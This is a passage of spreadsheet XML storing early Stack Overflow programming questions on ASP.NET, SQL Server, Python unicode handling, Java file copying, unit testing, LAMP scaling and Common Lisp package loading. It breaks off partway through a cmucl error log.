    <t xml:space="preserve">&lt;p&gt;With ASP.NET MVC (or using HttpHandlers) you can dynamically generate URLs, like the one in this question, which includes the title.&lt;/p&gt;
&lt;p&gt;What happens if the title changes (for example, editing it) and there's a link pointing to the page from another site, or Google's Pagerank was calculated for that URL?&lt;/p&gt;
&lt;p&gt;I guess it's all lost right? (The link points to nowhere and the pagerank calculated is lost)&lt;/p&gt;
&lt;p&gt;If so, is there a way to avoid it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set the default database in Sql Server from code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't seem to figure out how to set the default database in Sql Server from code. This can be either .Net code or T-Sql (T-Sql would be nice since it would be easy to use in any language). I searched Google and could only find how to do it in Sql Server Management Studio.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which SharePoint 2007 features are not available to Office 2003 users?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been tasked with coming up with a compatibility guide for SharePoint 2007 comparing Office 2003 and Office 2007. Does anyone know where to find such a list?&lt;/p&gt;
&lt;p&gt;I have been searching for awhile but I cannot seem to find a comprehensive list.&lt;/p&gt;
&lt;p&gt;Thanks :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I best connect Seam and GWT in a stateful web application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a web application that was implemented using GWT. What it presents is fetched from a Jboss/Seam server using the remoting mechanism, and this works fine. However, the application is now extended to support sessions and users. The Seam GWT service doesn't seem to provide a way to let me log in such that Seam can return restricted data back to the GWT application, and so it looks to me that I will have to wrap the GWT application in facelets.&lt;/p&gt;
&lt;p&gt;It is not obvious to me that a login using the Seam session mechanism will help me get correct data into the GWT application however, so my question is whether I will be lucky and it will just work, or if I need to do some client side magic, server side magic or if my perception of missing login functionality in the Seam GWT service actually is wrong.&lt;/p&gt;
&lt;p&gt;Bonus points to anyone that can provide me with a complete example showing something similar.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your favorite Visual Studio add-in/setting?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What add-in/setting in Visual Studio can you not live without? Which one improves your productivity or fixes something you can't stand in Visual Studio?  Why is it your favorite?&lt;/p&gt;
&lt;p&gt;My favorite is &lt;a href="http://www.ardentdev.com/blog/index.php/aspxedithelper"&gt;aspx edit helper&lt;/a&gt; because it does really improve my productivity when working with ASP.NET applications. What it does is provide a quick way to type out server side controls, it automatically fills in runat="server" and id=""  and puts your cursor in between the quotes of ID so you can type it in.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here is a summarized list of all the plugins discussed so far&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="http://www.ardentdev.com/blog/index.php/aspxedithelper"&gt;ASPX Edit Helper&lt;/a&gt; - Snippets for editing asp.net&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.jetbrains.com/resharper/index.html"&gt;Re-Sharper&lt;/a&gt; - Fast Refactoring&lt;/li&gt;
&lt;li&gt;&lt;a href="http://code.msdn.microsoft.com/PowerCommands"&gt;Power Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.red-gate.com/products/reflector/"&gt;Reflector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.roland-weigelt.de/ghostdoc/"&gt;GhostDoc&lt;/a&gt; - Generates XML comments&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wholetomato.com/"&gt;Visual Assist X&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.hanselman.com/blog/IntroducingRockScroll.aspx"&gt;Rock Scroll&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://testdriven.net/"&gt;TestDriven.NET&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.ncover.com/"&gt;NCover&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://ankhsvn.open.collab.net/"&gt;AnkhSVN&lt;/a&gt; - SVN Integration&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.viemu.com/"&gt;ViEmu&lt;/a&gt; - Vim Emulation&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.visualsvn.com/"&gt;VisualSVN&lt;/a&gt; - SVN Integration&lt;/li&gt;
&lt;li&gt;&lt;a href="http://frickinsweet.com/tools/Theme.mvc.aspx"&gt;Theme Generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeproject.com/KB/dotnet/Skype%5Fin%5FVisual%5FStudio.aspx"&gt;Skype Add-in&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeplex.com/xmlexplorer"&gt;XML Explorer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeplex.com/ResourceRefactoring"&gt;Resource Refactoring&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://weblogs.asp.net/scottgu/archive/2007/07/31/linq-to-sql-debug-visualizer.aspx"&gt;Linq2Sql Debugger Visualizer&lt;/a&gt; - Easily debug Linq2SQL&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.mindscape.co.nz/products/vsfileexplorer/"&gt;Visual Studio File Explorer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeplex.com/VSWindowManager"&gt;Visual Studio Window Manager&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://msdn.microsoft.com/en-us/teamsystem/bb980963.aspx"&gt;TFS PowerToys&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/bb397975.aspx"&gt;Expression Tree Visualizer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://code.msdn.microsoft.com/sourceanalysis/Release/ProjectReleases.aspx?ReleaseId=1425"&gt;StyleCop&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://janyou.itpub.net/post/8897/460372"&gt;Regions Manager&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.rauchy.net/regionerate/"&gt;Regionerate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codekeep.net/addins.aspx"&gt;Code Keep&lt;/a&gt; - Manage Code Snippets from anywhere&lt;/li&gt;
&lt;li&gt;&lt;a href="http://code.google.com/p/cr-documentor/"&gt;CR Documentor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://code.google.com/p/dxcorecommunityplugins/"&gt;DXCore Community Plugins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.nunit.org"&gt;NUnit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://msdn.microsoft.com/en-us/vcsharp/dd218053.aspx"&gt;CodeRush Xpress&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeplex.com/jslint"&gt;JSLint&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.codeplex.com/NUnitForVS"&gt;NUnit for VS&lt;/a&gt; - NUnit integration&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.developerfusion.com/community/blog-entry-redirect/8388451/"&gt;Instant Gratification&lt;/a&gt; - Tells you how awesome your code is&lt;/li&gt;
&lt;li&gt;&lt;a href="http://entrian.com/source-search/"&gt;Entrian Source Search&lt;/a&gt;, a Code Search add-in. "Find In Files" on steroids.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.redlizards.com/"&gt;Goanna&lt;/a&gt; - static analysis for C/C++&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.exactmagic.com/products/studiotools/index.html"&gt;StudioTools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.usysware.com/dpack/"&gt;USysWare DPack Code Browser&lt;/a&gt; - Fast code navigation &lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Fetch top X users, plus a specific user (if they're not in the top X)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list of ranked users, and would like to select the top 50. I also want to make sure one particular user is in this result set, even if they aren't in the top 50. Is there a sensible way to do this in a single mysql query? Or should I just check the results for the particular user and fetch him separately, if necessary?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing the default settings for a console application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would prefer that a console app would default to &lt;/p&gt;
&lt;p&gt;multithreaded debug.
warning level 4.
build browse information.
no resource folder.&lt;/p&gt;
&lt;p&gt;Does anyone know of any technique that would allow me to create a console app, with my desired options, without manually setting it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do I need to SEM_PRIORITY_Q when using a VxWorks inversion safe mutex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In VxWorks, I am creating a mutex with the SEM_INVERSION_SAFE option, to protect against the priority inversion problem.&lt;br /&gt;
The manual says that I &lt;strong&gt;must&lt;/strong&gt; also use the SEM_PRIORITY_Q option.  Why is that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why unicode() uses str() on my object only with no encoding given?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I start by creating a string variable with some &lt;strong&gt;non-ascii&lt;/strong&gt; &lt;em&gt;utf-8&lt;/em&gt; encoded data on it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; text = 'Ã¡'
&amp;gt;&amp;gt;&amp;gt; text
'\xc3\xa1'
&amp;gt;&amp;gt;&amp;gt; text.decode('utf-8')
u'\xe1'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using &lt;code&gt;unicode()&lt;/code&gt; on it raises errors...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; unicode(text)
Traceback (most recent call last):
  File "&amp;lt;stdin&amp;gt;", line 1, in &amp;lt;module&amp;gt;
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: 
                    ordinal not in range(128)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...but if I know the encoding I can use it as second parameter:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; unicode(text, 'utf-8')
u'\xe1'
&amp;gt;&amp;gt;&amp;gt; unicode(text, 'utf-8') == text.decode('utf-8')
True
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now if I have a class that returns this text in the &lt;code&gt;__str__()&lt;/code&gt; method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; class ReturnsEncoded(object):
...     def __str__(self):
...         return text
... 
&amp;gt;&amp;gt;&amp;gt; r = ReturnsEncoded()
&amp;gt;&amp;gt;&amp;gt; str(r)
'\xc3\xa1'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;unicode(r)&lt;/code&gt; seems to use &lt;code&gt;str()&lt;/code&gt; on it, since it raises the same error as &lt;code&gt;unicode(text)&lt;/code&gt; above:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; unicode(r)
Traceback (most recent call last):
  File "&amp;lt;stdin&amp;gt;", line 1, in &amp;lt;module&amp;gt;
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: 
                    ordinal not in range(128)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Until now everything is as planned!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;But as no one would ever expect, &lt;code&gt;unicode(r, 'utf-8')&lt;/code&gt; won't even try:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; unicode(r, 'utf-8')
Traceback (most recent call last):
  File "&amp;lt;stdin&amp;gt;", line 1, in &amp;lt;module&amp;gt;
TypeError: coercing to Unicode: need string or buffer, ReturnsEncoded found
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why? Why this inconsistent behavior? Is it a bug? is it intended? Very awkward.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Standard concise way to copy a file in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It has always bothered me that the only way to copy a file in Java involves opening streams, declaring a buffer, reading in one file, looping through it, and writing it out to the other steam.  The web is littered with similar, yet still slightly different implementations of this type of solution.&lt;/p&gt;
&lt;p&gt;Is there a better way that stays within the bounds of the Java language (meaning does not involve exec-ing OS specific commands)?  Perhaps in some reliable open source utility package, that would at least obscure this underlying implementation and provide a one line solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit Testing Guidelines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of where to find unit testing guidelines and recommendations?  I'd like to have something which addresses the following types of topics (for example):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Should tests be in the same project as application logic?&lt;/li&gt;
&lt;li&gt;Should I have test classes to mirror my logic classes or should I have only as many test classes as I feel I need to have?&lt;/li&gt;
&lt;li&gt;How should I name my test classes, methods, and projects (if they go in different projects)&lt;/li&gt;
&lt;li&gt;Should private, protected, and internal methods be tested, or just those that are publicly accessible?&lt;/li&gt;
&lt;li&gt;Should unit and integration tests be separated?&lt;/li&gt;
&lt;li&gt;Is there a &lt;strong&gt;good&lt;/strong&gt; reason not to have 100% test coverage?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What am I not asking about that I should be?&lt;/p&gt;
&lt;p&gt;An online resource would be best.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Java EE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I realize that literally it translates to Java Enterprise Edition. But what I'm asking is what does this really mean? When a company requires Java EE experience, what are they really asking for? Experience with EJBs? Experience with Java web apps?  &lt;/p&gt;
&lt;p&gt;I suspect that this means something different to different people and the definition is subjective.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How best to draw in the console?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a console (as in terminal, not gaming console) pong game in python and I'm having trouble figuring how best to (re)draw the game.&lt;/p&gt;
&lt;p&gt;I was thinking of having an 2d array as a sort of bitmap, editing the array to reflect the ball/paddles new positions and then casting each row to a string and printing it. However that means that the old "frames" will remain, and if the dimensions of the game are smaller than the console window, old frames will still be visible.&lt;/p&gt;
&lt;p&gt;Is there a way to delete characters from the console? '\b' I've heard is unreliable.&lt;/p&gt;
&lt;p&gt;Or is there an easier alternative route to outputting to the console for this sort of app?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>InternalsVisibleTo attribute isn't working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use the &lt;code&gt;InternalsVisibleTo&lt;/code&gt; assembly attribute to make my internal classes in a .NET class library visible to my unit test project.  For some reason, I keep getting an error message that says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;'MyClassName' is inaccessible due to its protection level&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Both assemblies are signed and I have the correct key listed in the attribute declaration.  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get source and variable values in ruby tracebacks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the last few frames of a typical Ruby on Rails traceback:
&lt;img src="http://img444.imageshack.us/img444/8990/rails-lastfew.png" alt="application trace" /&gt;&lt;/p&gt;
&lt;p&gt;And here are the last few frames of a typical Nevow traceback in Python:
&lt;img src="http://img444.imageshack.us/img444/9173/nw-lastfew.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;It's not just the web environment either, you can make similar comparisons between ipython and irb.  How can I get more of these sorts of details in Ruby?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET TreeView and Selecting the Selected Node</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I capture the event of the clicking the Selected Node of a TreeView?
It doesn't fire the &lt;strong&gt;SelectedNodeChanged&lt;/strong&gt; since the selection has obviously not changed but then what event can I catch so I know that the Selected Node was clicked?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;:
When I have some time, I'm going to have to dive into the bowels of the TreeView control and dig out what and where it handles the click events and subclass the TreeView to expose a new event OnSelectedNodeClicked.&lt;/p&gt;
&lt;p&gt;I'll probably do this over the Christmas holidays and I'll report back with the results.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;:
I have come up with a solution below that sub-classes the TreeView control.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does one add a custom build step to an automake-based project in KDevelop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently started work on a personal coding project using C++ and KDevelop.  Although I started out by just hacking around, I figure it'll be better in the long run if I set up a proper unit test suite before going too much further.  I've created a seperate test-runner executable as a sub project, and the tests I've added to it appear to function properly.  So far, success.&lt;/p&gt;
&lt;p&gt;However, I'd really like to get my unit tests running every time I build, not only when I explicitly run them.  This will be especially true as I split up the mess I've made into convenience libraries, each of which will probably have its own test executable.  Rather than run them all by hand, I'd like to get them to run as the final step in my build process.  I've looked all through the options in the project menu and the automake manager, but I can't figure out how to set this up.&lt;/p&gt;
&lt;p&gt;I imagine this could probably be done by editing the makefile by hand.  Unfortunately, my makefile-fu is a bit weak, and I'm also afraid that KDevelop might overwrite any changes I make by hand the next time I change something through the IDE.  Therefore, if there's an option on how to do this through KDevelop itself, I'd much prefer to go that way.&lt;/p&gt;
&lt;p&gt;Does anybody know how I could get KDevelop to run my test executables as part of the build process?  Thank you!&lt;/p&gt;
&lt;p&gt;(I'm not 100% tied to KDevelop.  If KDevelop can't do this, or else if there's an IDE that makes this much easier, I could be convinced to switch.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between a POST and a PUT HTTP REQUEST?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;They both seem to be sending data to the server inside the body, so what makes them different?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tools to annotate images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools do you use to annotate images?&lt;/p&gt;
&lt;p&gt;I mean, for example, placing a screenshot into documentation with some text bubbles, arrows, numbers for references in text and so on.&lt;/p&gt;
&lt;p&gt;Sure, you can do all of these in general graphics editor, but a specialized tool (or plugin for a generic editor) would be so much nicer and should produce more consistent results.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to compute the critical path of a directional acyclic graph?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best (regarding performance) way to compute the critical path of a directional acyclic graph when the nodes of the graph have weight?&lt;/p&gt;
&lt;p&gt;For example, if I have the following structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            Node A (weight 3)
               /            \
     Node B (weight 4)      Node D (weight 7)
     /               \
Node E (weight 2)   Node F (weight 3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The critical path should be A-&gt;B-&gt;F (total weight: 10)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can Flash save content without server-side help?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As far as I know, Flash has to pass info off to another external process in order to save files - POSTing to PHP or talking to an executable, right? But every once in a while I hear rumors that Flash is able to open a file, make changes, then save/write those changes, all on its own - is it possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display latest revision in a file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering how do you deal with displaying release revision number when pushing live new versions of your app?&lt;/p&gt;
&lt;p&gt;You can use &lt;code&gt;$Rev$&lt;/code&gt; in a file to get latest revision, but only after you update the file.&lt;/p&gt;
&lt;p&gt;What if I want to update a string in one file every time I change any file in the repository/directory?&lt;/p&gt;
&lt;p&gt;Is there a way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Optimal multiplayer maze generation algorithm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a simple multiplayer game in which 2-4 players are placed at separate entrypoints in a maze and need to reach a goal point.  Generating a maze in general is very easy, but in this case the goal of the game is to reach the goal before everyone else and I don't want the generation algorithm to drastically favor one player over others.&lt;/p&gt;
&lt;p&gt;So I'm looking for a maze generation algorithm where the optimal path for each player from the startpoint to the goal is no more than 10% more steps than the average path.  This way the players are on more or less an equal playing field.  Can anyone think up such an algorithm?&lt;/p&gt;
&lt;p&gt;(I've got one idea as it stands, but it's not well thought out and seems far less than optimal -- I'll post it as an answer.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parse multiple XML files with ASP.NET (C#) and return those with particular element</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings.&lt;/p&gt;
&lt;p&gt;I'm looking for a way to parse a number of XML files in a particular directory with ASP.NET (C#). I'd like to be able to return content from particular elements, but before that, need to find those that have a certain value between an element.&lt;/p&gt;
&lt;p&gt;Example XML file 1:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;file&amp;gt;
    &amp;lt;title&amp;gt;Title 1&amp;lt;/title&amp;gt;
    &amp;lt;someContent&amp;gt;Content&amp;lt;/someContent&amp;gt;
    &amp;lt;filter&amp;gt;filter&amp;lt;/filter&amp;gt;
&amp;lt;/file&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example XML file 2:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;file&amp;gt;
    &amp;lt;title&amp;gt;Title 2&amp;lt;/title&amp;gt;
    &amp;lt;someContent&amp;gt;Content&amp;lt;/someContent&amp;gt;
    &amp;lt;filter&amp;gt;filter, different filter&amp;lt;/filter&amp;gt;
&amp;lt;/file&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example case 1:&lt;/p&gt;
&lt;p&gt;Give me all XML that has a filter of 'filter'.&lt;/p&gt;
&lt;p&gt;Example case 2:&lt;/p&gt;
&lt;p&gt;Give me all XML that has a title of 'Title 1'.&lt;/p&gt;
&lt;p&gt;Looking, it seems this should be possible with LINQ, but I've only seen examples on how to do this when there is one XML file, not when there are multiples, such as in this case.&lt;/p&gt;
&lt;p&gt;I would prefer that this be done on the server-side, so that I can cache on that end.&lt;/p&gt;
&lt;p&gt;Functionality from any version of the .NET Framework can be used.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;~James&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to extract a timezone from a mail Date header in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to store the timezone an email was sent from. Which is the best way to extract it from the email's 'Date:' header (an RFC822 date)? And what is the recommended format to store it in the database (I'm using hibernate)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Subclassed form not behaving properly in Designer view (VS 2008)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have subclassed &lt;code&gt;Form&lt;/code&gt; to include some extra functionality, which boils down to a &lt;code&gt;List&amp;lt;Image&amp;gt;&lt;/code&gt; which displays in a set of predefined spots on the form. I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ButtonForm : Form 
{
    public class TitleButton
    {
        public TitleButton() { /* does stuff here */ }
        // there's other stuff too, just thought I should point out there's
        // a default constructor.
    }
    private List&amp;lt;TitleButton&amp;gt; _buttons = new List&amp;lt;TitleButton&amp;gt;();
    public List&amp;lt;TitleButton&amp;gt; TitleButtons
    {
        get { return _buttons; }
        set { _buttons = value; }
    }
    // Other stuff here
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then my actual form that I want to use is a subclass of &lt;code&gt;ButtonForm&lt;/code&gt; instead of &lt;code&gt;Form&lt;/code&gt;. This all works great, Designer even picks up the new property and shows it up on the property list. I thought this would be great! It showed the collection, I could add the buttons into there and away I would go. So I opened the collection editor, added in all the objects, and lo and behold, there sitting in the designer was a picture perfect view of what I wanted.&lt;/p&gt;
&lt;p&gt;This is where it starts to get ugly. For some reason or another, Designer refuses to actually generate code to create the objects and attach them to the collection, so while it looks great in Design mode, as soon as I compile and run it, it all disappears again and I'm back to square one. I'm at a total loss as to why this would happen; if the Designer can generate it well enough to get a picture perfect view of my form with the extra behaviour, why can't/won't it generate the code into the actual code file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code behind in ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the purpose of the code behind view file in ASP.NET MVC besides setting of the generic parameter of ViewPage ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>best way to get started in setting up Mono for ASP.NET on Mac</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have recently gained access to a Mac. I am wondering if anyone has any tips/advice for setting up &lt;a href="http://www.mono-project.com/Main_Page"&gt;Mono&lt;/a&gt; on a mac for development and execution of ASP.NET? Most resources point to Linux implementations which tend to differ a lot from the way Mac's do things. Any tips or advice would be helpful&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The ideal multi-server LAMP environment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's alot of information out there on setting up LAMP stacks on a single box, or perhaps moving MySQL onto it's own box, but growing beyond that doesn't seem to be very well documented.&lt;/p&gt;
&lt;p&gt;My current web environment is having capacity issues, and so I'm looking for &lt;strong&gt;best-practices&lt;/strong&gt; regarding &lt;strong&gt;configuration tuning&lt;/strong&gt;, determining &lt;strong&gt;bottlenecks&lt;/strong&gt;, &lt;strong&gt;security&lt;/strong&gt;, etc.  &lt;/p&gt;
&lt;p&gt;I presently host around 400 sites, with a fair need for redundany and security, and so I've grown beyond the single-box solution - but am not at the level of a full ISP or dedicated web-hosting company.&lt;/p&gt;
&lt;p&gt;Can anyone point me in the direction of some good &lt;strong&gt;expertise on setting up a great apache web-farm&lt;/strong&gt; with a view to security and future expansion?&lt;/p&gt;
&lt;p&gt;My web environment consists of 2 redundant MySQL servers, 2 redundant web-content servers, 2 load balancing front-end apache servers that mount the content via nfs and share apache config and sessions directories between them, and a single "developer's" server which also mounts the web-content via nfs, and contains all the developer accounts. &lt;/p&gt;
&lt;p&gt;I'm pretty happy with alot of this setup, but it seems to be choking on the load prematurely.&lt;/p&gt;
&lt;p&gt;Thanks!!&lt;/p&gt;
&lt;p&gt;--UPDATE--&lt;/p&gt;
&lt;p&gt;Turns out the "choking on the load" is related to &lt;code&gt;mod_log_sql&lt;/code&gt;, which I use to send my apache logs to a mysql database.  By re-configuring the webservers to write their sql statements to a disk file, and then creating a separate process to submit those to the database it allows the webservers to free up their threads much quicker, and handle a much greater load.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Script.aculo.us Autocompleter problem in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm struggling with a problem with the Script.aculo.us Autocompleter control in IE (I've tried it in IE6 &amp;amp; 7). The suggestions fail to appear for the first character is entered into the text box after the page has been loaded. After that initial failure, the control works as it should.&lt;/p&gt;
&lt;p&gt;I've verified that the suggestions data is returned from the server correctly; the problem appears to have something to do with the positioning of the suggestions element, as other relatively positioned elements on the page move out of position at the moment that you'd expect the suggestions to appear.&lt;/p&gt;
&lt;p&gt;Has anyone heard of such a problem or have any suggestions on how to fix it?&lt;/p&gt;
&lt;p&gt;Edit: In response to Chris, I have set the partialChars parameter to 1 and the control works in all the other browsers I've tried, which are the latest versions of Firefox, Safari, Opera, and Chrome. I should probably have made that clear in the first place. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you use TestLink and are you happy with it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In our project, we use this software for test management. What is your experience with this software ? Does it scale correctly with thousands of tests ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically updating FILEVERSION in a MFC app w/SVN revision number</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I go about programmatically updating the FILEVERSION string in an MFC app? I have a build process that I use to generate a header file which contains the SVN rev for a given release. I'm using SvnRev from &lt;a href="http://www.compuphase.com/svnrev.htm" rel="nofollow"&gt;http://www.compuphase.com/svnrev.htm&lt;/a&gt; to update a header file which I use to set the caption bar of my MFC app. Now I want to use this #define for my FILEVERION info. &lt;/p&gt;
&lt;p&gt;What's the best way to proceed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use (require :PACKAGE) in clisp under Ubuntu Hardy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to evaluate the answer &lt;a href="http://stackoverflow.com/questions/108081/are-there-any-high-level-easy-to-install-gui-libraries-for-common-lisp"&gt;provided here&lt;/a&gt;, and am getting the error: &lt;code&gt;"A file with name ASDF-INSTALL does not exist"&lt;/code&gt; when using clisp:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dsm@localhost:~$ clisp -q
[1]&amp;gt; (require :asdf-install)
*** - LOAD: A file with name ASDF-INSTALL does not exist
The following restarts are available:
ABORT          :R1      ABORT
Break 1 [2]&amp;gt; :r1
[3]&amp;gt; (quit)
dsm@localhost:~$
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;cmucl throws a similar error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dsm@localhost:~$ cmucl -q
Warning:  #&amp;lt;Command Line Switch "q"&amp;gt; is an illegal switch
CMU Common Lisp CVS release-19a 19a-release-20040728 + minimal debian patches, running on crap-pile
With core: /usr/lib/cmucl/lisp.core
Dumped on: Sat, 2008-09-20 20:11:54+02:00 on localhost
